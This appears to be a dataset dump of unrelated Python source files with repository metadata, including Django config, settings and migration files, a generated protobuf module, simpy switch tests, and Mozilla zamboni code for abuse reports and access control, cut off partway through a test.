4e1cd719cfa46c689fd0b63ee03bf2f1c80310ca | 75a179e8ddba54442697de87a3846f1711a30bae | /crudoperation/crudoperation/wsgi.py | 5d9ef489b1f5198e5c28ae26457fc488c0ac661e | [] | no_license | amanlalwani007/drftutorial | 2b5a5338b3146b1feb88c4d815fbf996dd49cb9d | 4f5c651f4dee98a359b7a6e34d0ae9a8f8630e68 | refs/heads/master | 2023-07-09T01:28:04.921042 | 2021-08-21T10:59:06 | 2021-08-21T10:59:06 | 392,457,445 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for crudoperation project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'crudoperation.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
3cdf409b425746438571d689e6c72da67e98299d | bc441bb06b8948288f110af63feda4e798f30225 | /idcmanager_sdk/model/easy_command/task_spec_pb2.py | ec6575adc9e75b93acae8423644206c9fe3269cc | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 9,559 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: task_spec.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from idcmanager_sdk.model.easy_command import action_pb2 as idcmanager__sdk_dot_model_dot_easy__command_dot_action__pb2
from idcmanager_sdk.model.easy_command import target_pb2 as idcmanager__sdk_dot_model_dot_easy__command_dot_target__pb2
from idcmanager_sdk.model.easy_command import task_callback_pb2 as idcmanager__sdk_dot_model_dot_easy__command_dot_task__callback__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='task_spec.proto',
package='easy_command',
syntax='proto3',
serialized_options=_b('ZFgo.easyops.local/contracts/protorepo-models/easyops/model/easy_command'),
serialized_pb=_b('\n\x0ftask_spec.proto\x12\x0c\x65\x61sy_command\x1a.idcmanager_sdk/model/easy_command/action.proto\x1a.idcmanager_sdk/model/easy_command/target.proto\x1a\x35idcmanager_sdk/model/easy_command/task_callback.proto\"\xef\x02\n\x08TaskSpec\x12\x0e\n\x06taskId\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0c\n\x04type\x18\x03 \x01(\t\x12\x11\n\toperation\x18\x04 \x01(\t\x12\x0f\n\x07groupId\x18\x05 \x01(\t\x12%\n\x07\x61\x63tions\x18\x06 \x03(\x0b\x32\x14.easy_command.Action\x12%\n\x07targets\x18\x07 \x03(\x0b\x32\x14.easy_command.Target\x12\r\n\x05\x61ppId\x18\x08 \x01(\t\x12\x11\n\tclusterId\x18\t \x01(\t\x12\x11\n\tpackageId\x18\n \x01(\t\x12\x11\n\tversionId\x18\x0b \x01(\t\x12\x12\n\nneedNotify\x18\x0c \x01(\x08\x12,\n\x08\x63\x61llback\x18\r \x01(\x0b\x32\x1a.easy_command.TaskCallback\x12\x10\n\x08\x62\x61tchNum\x18\x0e \x01(\x05\x12\x15\n\rbatchInterval\x18\x0f \x01(\x05\x12\x12\n\nfailedStop\x18\x10 \x01(\x08\x42HZFgo.easyops.local/contracts/protorepo-models/easyops/model/easy_commandb\x06proto3')
,
dependencies=[idcmanager__sdk_dot_model_dot_easy__command_dot_action__pb2.DESCRIPTOR,idcmanager__sdk_dot_model_dot_easy__command_dot_target__pb2.DESCRIPTOR,idcmanager__sdk_dot_model_dot_easy__command_dot_task__callback__pb2.DESCRIPTOR,])
_TASKSPEC = _descriptor.Descriptor(
name='TaskSpec',
full_name='easy_command.TaskSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='taskId', full_name='easy_command.TaskSpec.taskId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='easy_command.TaskSpec.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='easy_command.TaskSpec.type', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operation', full_name='easy_command.TaskSpec.operation', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='groupId', full_name='easy_command.TaskSpec.groupId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='actions', full_name='easy_command.TaskSpec.actions', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='targets', full_name='easy_command.TaskSpec.targets', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='appId', full_name='easy_command.TaskSpec.appId', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='clusterId', full_name='easy_command.TaskSpec.clusterId', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='easy_command.TaskSpec.packageId', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionId', full_name='easy_command.TaskSpec.versionId', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='needNotify', full_name='easy_command.TaskSpec.needNotify', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callback', full_name='easy_command.TaskSpec.callback', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batchNum', full_name='easy_command.TaskSpec.batchNum', index=13,
number=14, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batchInterval', full_name='easy_command.TaskSpec.batchInterval', index=14,
number=15, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='failedStop', full_name='easy_command.TaskSpec.failedStop', index=15,
number=16, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=185,
serialized_end=552,
)
_TASKSPEC.fields_by_name['actions'].message_type = idcmanager__sdk_dot_model_dot_easy__command_dot_action__pb2._ACTION
_TASKSPEC.fields_by_name['targets'].message_type = idcmanager__sdk_dot_model_dot_easy__command_dot_target__pb2._TARGET
_TASKSPEC.fields_by_name['callback'].message_type = idcmanager__sdk_dot_model_dot_easy__command_dot_task__callback__pb2._TASKCALLBACK
DESCRIPTOR.message_types_by_name['TaskSpec'] = _TASKSPEC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TaskSpec = _reflection.GeneratedProtocolMessageType('TaskSpec', (_message.Message,), {
'DESCRIPTOR' : _TASKSPEC,
'__module__' : 'task_spec_pb2'
# @@protoc_insertion_point(class_scope:easy_command.TaskSpec)
})
_sym_db.RegisterMessage(TaskSpec)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
2aeb0cb802cd448cc40eb31633927bc1dec209e9 | 6288f56016e0a1dc9e4a4eceb18425d4ae27f4a3 | /tests/test_shared_bandwidth_switch.py | a56dcf16eb26e6f748983a354187ef70850c7256 | [] | no_license | brettviren/ersatz | ec547fe347bfcc9ccafce7b159cc6378f3f4ab7d | 187df8096d5dadae2a115a7796cafd6d59c4f6af | refs/heads/master | 2021-01-17T22:14:06.475993 | 2018-01-21T18:31:31 | 2018-01-21T18:31:31 | 60,030,033 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,263 | py | #!/usr/bin/env python3
import simpy
from ersatz.switch import Switch, LinkedSwitch
from ersatz.datum import Datum
from ersatz.monitoring import trace
def test_balance():
sw = Switch(None, 100)
for ip in range(5):
for op in range(max(0,ip-2),min(5,ip+2)):
sw.stage(Datum(ip, op, 10, None))
imb,count = sw.balance()
print ('%d iters: max adj: %.1f' % (count, imb))
sw.dump()
with open('test_balance.dot','w') as fp:
fp.write(sw.dot())
def slurp(env, outbox):
while True:
datum = yield outbox.get()
print ('final: %s' % datum)
print ('\tDONE: at %.1f, %s' % \
(env.now, datum.payload))
print('\t : %s -> %s' % (datum.txaddr, datum.rxaddr))
def add_stream(env, inbox, wait, txaddr, rxaddr, size, payload):
print ('waiting %f to start stream of "%s"' % (wait, payload))
yield env.timeout(wait)
print ('starting stream with payload "%s"' % payload)
yield inbox.put(Datum(txaddr, rxaddr, size, payload))
class FillData(object):
def __init__(self):
self.data = list()
def __call__(self, t, prio, eid, event):
self.data.append((t, prio, eid, event))
def test_switching():
env = simpy.Environment()
monitor = FillData()
trace(env, monitor)
sw = Switch(env, 10)
env.process(slurp(env, sw.outbox))
env.process(add_stream(env, sw.inbox, 0, 'p1', 'p2', 50, "datum1"))
env.process(add_stream(env, sw.inbox, 2, 'p1', 'p3', 50, "datum2"))
env.process(add_stream(env, sw.inbox, 4, 'p2', 'p3', 50, "datum3"))
env.run(until=200)
# for item in monitor.data:
# print (str(item))
def test_linked():
env = simpy.Environment()
nic1_addr = 'nic1'
nic1_tx = simpy.Store(env)
nic2_addr = 'nic2'
nic2_rx = simpy.Store(env)
env.process(add_stream(env, nic1_tx, 2, nic1_addr, nic2_addr, 50, "hello world"))
env.process(slurp(env, nic2_rx))
lsw = LinkedSwitch(env, 10)
print ("Linking nic1")
lsw.link_nic(nic1_addr, None, nic1_tx)
print ("Linking nic2")
lsw.link_nic(nic2_addr, nic2_rx, None)
print ("running")
env.run(until=200)
if '__main__' == __name__:
test_balance()
test_switching()
test_linked()
| [
"[email protected]"
] | |
918a5618d56e51317a4a67dafb2975bf2f9b5e58 | 15531adf1e9b66db6259a52d16d0b0ddd672f4e9 | /backend-project/small_eod/institutions/migrations/0009_auto_20200618_2320.py | f79ca4d496e41841d8d2f2d73ddddb1de08763ad | [
"MIT"
] | permissive | watchdogpolska/small_eod | 2c81b0bb67113a4fd9f5c9c0f8b07daa2399e243 | 509f532e10c20e700cb9b37c73f4a695b53b42a8 | refs/heads/dev | 2023-09-01T01:30:44.681105 | 2022-03-31T19:36:39 | 2022-03-31T22:20:42 | 136,141,184 | 66 | 75 | MIT | 2023-09-04T14:33:37 | 2018-06-05T07:56:33 | Python | UTF-8 | Python | false | false | 739 | py | # Generated by Django 3.0.7 on 2020-06-18 23:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tags', '0005_merge_multiple_leaf_nodes'),
('institutions', '0008_auto_20200528_1330'),
]
operations = [
migrations.AddField(
model_name='institution',
name='comment',
field=models.CharField(blank=True, help_text='Comment for this case.', max_length=256, verbose_name='Comment'),
),
migrations.AddField(
model_name='institution',
name='tags',
field=models.ManyToManyField(blank=True, help_text='Choose tags.', to='tags.Tag', verbose_name='Tags'),
),
]
| [
"[email protected]"
] | |
f761f157069a51fef2dade3ebdadd11611dbe111 | a18fba3eeb79b51faa55fcb1c45804ae57bb0aa4 | /wall_erd/Wall/settings.py | 7b1d1b9a14c56ad892d1bab1b6d1ec353c721c7b | [] | no_license | Catrinici/Python_Django | a850f732734f799c923035d4b28a9553e288194f | 9415b40a49fc9aa0a685937a62e259bd8103e208 | refs/heads/master | 2023-04-28T13:22:16.987969 | 2019-10-15T15:41:38 | 2019-10-15T15:41:38 | 206,885,302 | 1 | 0 | null | 2023-04-21T20:37:48 | 2019-09-06T22:52:27 | Python | UTF-8 | Python | false | false | 3,111 | py | """
Django settings for Wall project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'gi=3du&z-q8>8tc%z$x7qj#%zl=cm8xaya0mty3fxav3w#m2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.wall_app',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Wall.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Wall.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
1582894d4bea212dea2a8089c8abb504a9236e37 | 9b9a02657812ea0cb47db0ae411196f0e81c5152 | /repoData/mozilla-zamboni/allPythonContent.py | a29dff3dd225280fe065aaccbef6790300d3de5c | [] | no_license | aCoffeeYin/pyreco | cb42db94a3a5fc134356c9a2a738a063d0898572 | 0ac6653219c2701c13c508c5c4fc9bc3437eea06 | refs/heads/master | 2020-12-14T14:10:05.763693 | 2016-06-27T05:15:15 | 2016-06-27T05:15:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,045,082 | py | __FILENAME__ = models
import logging
from django.conf import settings
from django.db import models
from django.utils.translation import gettext
import amo.models
import amo.utils
from addons.models import Addon
from users.models import UserProfile
log = logging.getLogger('z.abuse')
class AbuseReport(amo.models.ModelBase):
# NULL if the reporter is anonymous.
reporter = models.ForeignKey(UserProfile, null=True,
blank=True, related_name='abuse_reported')
ip_address = models.CharField(max_length=255, default='0.0.0.0')
# An abuse report can be for an addon or a user. Only one of these should
# be null.
addon = models.ForeignKey(Addon, null=True, related_name='abuse_reports')
user = models.ForeignKey(UserProfile, null=True,
related_name='abuse_reports')
message = models.TextField()
class Meta:
db_table = 'abuse_reports'
def send(self):
obj = self.addon or self.user
if self.reporter:
user_name = '%s (%s)' % (self.reporter.name, self.reporter.email)
else:
user_name = 'An anonymous coward'
with amo.utils.no_translation():
type_ = (gettext(amo.ADDON_TYPE[self.addon.type])
if self.addon else 'User')
subject = u'[%s] Abuse Report for %s' % (type_, obj.name)
msg = u'%s reported abuse for %s (%s%s).\n\n%s' % (
user_name, obj.name, settings.SITE_URL, obj.get_url_path(),
self.message)
amo.utils.send_mail(subject, msg,
recipient_list=(settings.ABUSE_EMAIL,))
@classmethod
def recent_high_abuse_reports(cls, threshold, period, addon_id=None,
addon_type=None):
"""
Returns AbuseReport objects for the given threshold over the given time
period (in days). Filters by addon_id or addon_type if provided.
E.g. Greater than 5 abuse reports for all webapps in the past 7 days.
"""
abuse_sql = ['''
SELECT `abuse_reports`.*,
COUNT(`abuse_reports`.`addon_id`) AS `num_reports`
FROM `abuse_reports`
INNER JOIN `addons` ON (`abuse_reports`.`addon_id` = `addons`.`id`)
WHERE `abuse_reports`.`created` >= %s ''']
params = [period]
if addon_id:
abuse_sql.append('AND `addons`.`id` = %s ')
params.append(addon_id)
elif addon_type and addon_type in amo.ADDON_TYPES:
abuse_sql.append('AND `addons`.`addontype_id` = %s ')
params.append(addon_type)
abuse_sql.append('GROUP BY addon_id HAVING num_reports > %s')
params.append(threshold)
return list(cls.objects.raw(''.join(abuse_sql), params))
def send_abuse_report(request, obj, message):
report = AbuseReport(ip_address=request.META.get('REMOTE_ADDR'),
message=message)
if request.user.is_authenticated():
report.reporter = request.amo_user
if isinstance(obj, Addon):
report.addon = obj
elif isinstance(obj, UserProfile):
report.user = obj
report.save()
report.send()
# Trigger addon high abuse report detection task.
if isinstance(obj, Addon):
from amo.tasks import find_abuse_escalations
find_abuse_escalations.delay(obj.id)
########NEW FILE########
__FILENAME__ = test_models
from django.conf import settings
from django.core import mail
from nose.tools import eq_
import amo.tests
from abuse.models import AbuseReport
class TestAbuse(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/user_999']
def test_user(self):
AbuseReport(user_id=999).send()
assert mail.outbox[0].subject.startswith('[User]')
eq_(mail.outbox[0].to, [settings.ABUSE_EMAIL])
def test_addon(self):
AbuseReport(addon_id=3615).send()
assert mail.outbox[0].subject.startswith('[Extension]')
def test_addon_fr(self):
with self.activate(locale='fr'):
AbuseReport(addon_id=3615).send()
assert mail.outbox[0].subject.startswith('[Extension]')
########NEW FILE########
__FILENAME__ = acl
import amo
def match_rules(rules, app, action):
"""
This will match rules found in Group.
"""
for rule in rules.split(','):
rule_app, rule_action = rule.split(':')
if rule_app == '*' or rule_app == app:
if (rule_action == '*'
or rule_action == action
or action == '%'):
return True
return False
def action_allowed(request, app, action):
"""
Determines if the request user has permission to do a certain action
'Admin:%' is true if the user has any of:
('Admin:*', 'Admin:%s'%whatever, '*:*',) as rules.
"""
allowed = any(match_rules(group.rules, app, action) for group in
getattr(request, 'groups', ()))
return allowed
def action_allowed_user(user, app, action):
"""Similar to action_allowed, but takes user instead of request."""
allowed = any(match_rules(group.rules, app, action) for group in
user.groups.all())
return allowed
def check_ownership(request, obj, require_owner=False, require_author=False,
ignore_disabled=False, admin=True):
"""
A convenience function. Check if request.user has permissions
for the object.
"""
if hasattr(obj, 'check_ownership'):
return obj.check_ownership(request, require_owner=require_owner,
require_author=require_author,
ignore_disabled=ignore_disabled,
admin=admin)
return False
def check_addon_ownership(request, addon, viewer=False, dev=False,
support=False, admin=True, ignore_disabled=False):
"""
Check request.amo_user's permissions for the addon.
If user is an admin they can do anything.
If the add-on is disabled only admins have permission.
If they're an add-on owner they can do anything.
dev=True checks that the user has an owner or developer role.
viewer=True checks that the user has an owner, developer, or viewer role.
support=True checks that the user has a support role.
"""
if not request.user.is_authenticated():
return False
# Deleted addons can't be edited at all.
if addon.is_deleted:
return False
# Users with 'Addons:Edit' can do anything.
if admin and action_allowed(request, 'Addons', 'Edit'):
return True
# Only admins can edit admin-disabled addons.
if addon.status == amo.STATUS_DISABLED and not ignore_disabled:
return False
# Addon owners can do everything else.
roles = (amo.AUTHOR_ROLE_OWNER,)
if dev:
roles += (amo.AUTHOR_ROLE_DEV,)
# Viewer privs are implied for devs.
elif viewer:
roles += (amo.AUTHOR_ROLE_DEV, amo.AUTHOR_ROLE_VIEWER,
amo.AUTHOR_ROLE_SUPPORT)
# Support can do support.
elif support:
roles += (amo.AUTHOR_ROLE_SUPPORT,)
return addon.authors.filter(pk=request.amo_user.pk,
addonuser__role__in=roles).exists()
def check_reviewer(request, only=None, region=None):
if only == 'app' and region is not None:
# This is for reviewers in special regions (e.g., China).
from mkt.regions.utils import parse_region
region_slug = parse_region(region).slug.upper()
return action_allowed(request, 'Apps', 'ReviewRegion%s' % region_slug)
addon = action_allowed(request, 'Addons', 'Review')
app = action_allowed(request, 'Apps', 'Review')
if only == 'addon':
return addon
elif only == 'app':
return app
return addon or app
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import Group, GroupUser
class GroupUserInline(admin.TabularInline):
model = GroupUser
raw_id_fields = ('user',)
class GroupAdmin(admin.ModelAdmin):
raw_id_fields = ('users',)
ordering = ('name',)
list_display = ('name', 'rules', 'notes')
inlines = (GroupUserInline,)
admin.site.register(Group, GroupAdmin)
########NEW FILE########
__FILENAME__ = helpers
import jinja2
from jingo import register
import acl
@register.function
@jinja2.contextfunction
def check_ownership(context, object, require_owner=False,
require_author=False, ignore_disabled=True):
return acl.check_ownership(context['request'], object,
require_owner=require_owner,
require_author=require_author,
ignore_disabled=ignore_disabled)
@register.function
@jinja2.contextfunction
def action_allowed(context, app, action):
return acl.action_allowed(context['request'], app, action)
########NEW FILE########
__FILENAME__ = middleware
"""
This middleware will handle marking users into certain groups and loading
their ACLs into the request.
"""
from functools import partial
import commonware.log
import amo
from access import acl
log = commonware.log.getLogger('z.access')
class ACLMiddleware(object):
def process_request(self, request):
"""Attach authentication/permission helpers to request."""
request.check_ownership = partial(acl.check_ownership, request)
# figure out our list of groups...
if request.user.is_authenticated():
amo.set_user(request.user)
request.groups = request.user.groups.all()
request.amo_user = request.user
else:
request.amo_user = None
def process_response(self, request, response):
amo.set_user(None)
return response
def process_exception(self, request, exception):
amo.set_user(None)
########NEW FILE########
__FILENAME__ = models
from django.db import models
from django import dispatch
from django.db.models import signals
import amo
import amo.models
import commonware.log
log = commonware.log.getLogger('z.users')
class Group(amo.models.ModelBase):
name = models.CharField(max_length=255, default='')
rules = models.TextField()
users = models.ManyToManyField('users.UserProfile', through='GroupUser',
related_name='groups')
notes = models.TextField(blank=True)
class Meta:
db_table = 'groups'
def __unicode__(self):
return self.name
class GroupUser(models.Model):
group = models.ForeignKey(Group)
user = models.ForeignKey('users.UserProfile')
class Meta:
db_table = u'groups_users'
@dispatch.receiver(signals.post_save, sender=GroupUser,
dispatch_uid='groupuser.post_save')
def groupuser_post_save(sender, instance, **kw):
if kw.get('raw'):
return
amo.log(amo.LOG.GROUP_USER_ADDED, instance.group, instance.user)
log.info('Added %s to %s' % (instance.user, instance.group))
@dispatch.receiver(signals.post_delete, sender=GroupUser,
dispatch_uid='groupuser.post_delete')
def groupuser_post_delete(sender, instance, **kw):
if kw.get('raw'):
return
amo.log(amo.LOG.GROUP_USER_REMOVED, instance.group, instance.user)
log.info('Removed %s from %s' % (instance.user, instance.group))
########NEW FILE########
__FILENAME__ = tests
from django.http import HttpRequest
import mock
from nose.tools import assert_false
import amo
from amo.tests import TestCase, req_factory_factory
from amo.urlresolvers import reverse
from addons.models import Addon, AddonUser
from users.models import UserProfile
from .acl import (action_allowed, check_addon_ownership, check_ownership,
check_reviewer, match_rules)
def test_match_rules():
"""
Unit tests for the match_rules method.
"""
rules = (
'*:*',
'Editors:*,Admin:EditAnyAddon,Admin:flagged,Admin:addons,'
'Tests:*,Admin:serverstatus,Admin:users',
'Admin:EditAnyAddon,Admin:EditAnyLocale,Editors:*,'
'Admin:lists,Admin:applications,Admin:addons,Localizers:*',
'Admin:EditAnyAddon',
'Admin:ViewAnyStats,',
'Admin:ViewAnyStats',
'Editors:*,Admin:features',
'Admin:Statistics',
'Admin:Features,Editors:*',
'Admin:%',
'Admin:*',
'Admin:Foo',
'Admin:Bar',
)
for rule in rules:
assert match_rules(rule, 'Admin', '%'), "%s != Admin:%%" % rule
rules = (
'Doctors:*',
'Stats:View',
'Addons:Review',
'Apps:Review',
'Personas:Review',
'Locales:Edit',
'Locale.de:Edit',
'Reviews:Edit',
'None:None',
)
for rule in rules:
assert not match_rules(rule, 'Admin', '%'), \
"%s == Admin:%% and shouldn't" % rule
def test_anonymous_user():
# Fake request must not have .groups, just like an anonymous user.
fake_request = HttpRequest()
assert_false(action_allowed(fake_request, amo.FIREFOX, 'Admin:%'))
class ACLTestCase(TestCase):
"""Test some basic ACLs by going to various locked pages on AMO."""
fixtures = ['access/login.json']
def test_admin_login_anon(self):
# Login form for anonymous user on the admin page.
url = '/en-US/admin/models/'
r = self.client.get(url)
self.assertRedirects(r, '%s?to=%s' % (reverse('users.login'), url))
class TestHasPerm(TestCase):
fixtures = ['base/apps', 'base/users', 'base/addon_3615']
def setUp(self):
assert self.client.login(username='[email protected]', password='password')
self.user = UserProfile.objects.get(email='[email protected]')
self.addon = Addon.objects.get(id=3615)
self.au = AddonUser.objects.get(addon=self.addon, user=self.user)
assert self.au.role == amo.AUTHOR_ROLE_OWNER
self.request = mock.Mock()
self.request.groups = ()
self.request.amo_user = self.user
self.request.user.is_authenticated.return_value = True
def login_admin(self):
assert self.client.login(username='[email protected]',
password='password')
return UserProfile.objects.get(email='[email protected]')
def test_anonymous(self):
self.request.user.is_authenticated.return_value = False
self.client.logout()
assert not check_addon_ownership(self.request, self.addon)
def test_admin(self):
self.request.amo_user = self.login_admin()
self.request.groups = self.request.amo_user.groups.all()
assert check_addon_ownership(self.request, self.addon)
assert check_addon_ownership(self.request, self.addon, admin=True)
assert not check_addon_ownership(self.request, self.addon, admin=False)
def test_require_author(self):
assert check_ownership(self.request, self.addon, require_author=True)
def test_require_author_when_admin(self):
self.request.amo_user = self.login_admin()
self.request.groups = self.request.amo_user.groups.all()
assert check_ownership(self.request, self.addon, require_author=False)
assert not check_ownership(self.request, self.addon,
require_author=True)
def test_disabled(self):
self.addon.update(status=amo.STATUS_DISABLED)
assert not check_addon_ownership(self.request, self.addon)
self.test_admin()
def test_deleted(self):
self.addon.update(status=amo.STATUS_DELETED)
assert not check_addon_ownership(self.request, self.addon)
self.request.amo_user = self.login_admin()
self.request.groups = self.request.amo_user.groups.all()
assert not check_addon_ownership(self.request, self.addon)
def test_ignore_disabled(self):
self.addon.update(status=amo.STATUS_DISABLED)
assert check_addon_ownership(self.request, self.addon,
ignore_disabled=True)
def test_owner(self):
assert check_addon_ownership(self.request, self.addon)
self.au.role = amo.AUTHOR_ROLE_DEV
self.au.save()
assert not check_addon_ownership(self.request, self.addon)
self.au.role = amo.AUTHOR_ROLE_VIEWER
self.au.save()
assert not check_addon_ownership(self.request, self.addon)
self.au.role = amo.AUTHOR_ROLE_SUPPORT
self.au.save()
assert not check_addon_ownership(self.request, self.addon)
def test_dev(self):
assert check_addon_ownership(self.request, self.addon, dev=True)
self.au.role = amo.AUTHOR_ROLE_DEV
self.au.save()
assert check_addon_ownership(self.request, self.addon, dev=True)
self.au.role = amo.AUTHOR_ROLE_VIEWER
self.au.save()
assert not check_addon_ownership(self.request, self.addon, dev=True)
self.au.role = amo.AUTHOR_ROLE_SUPPORT
self.au.save()
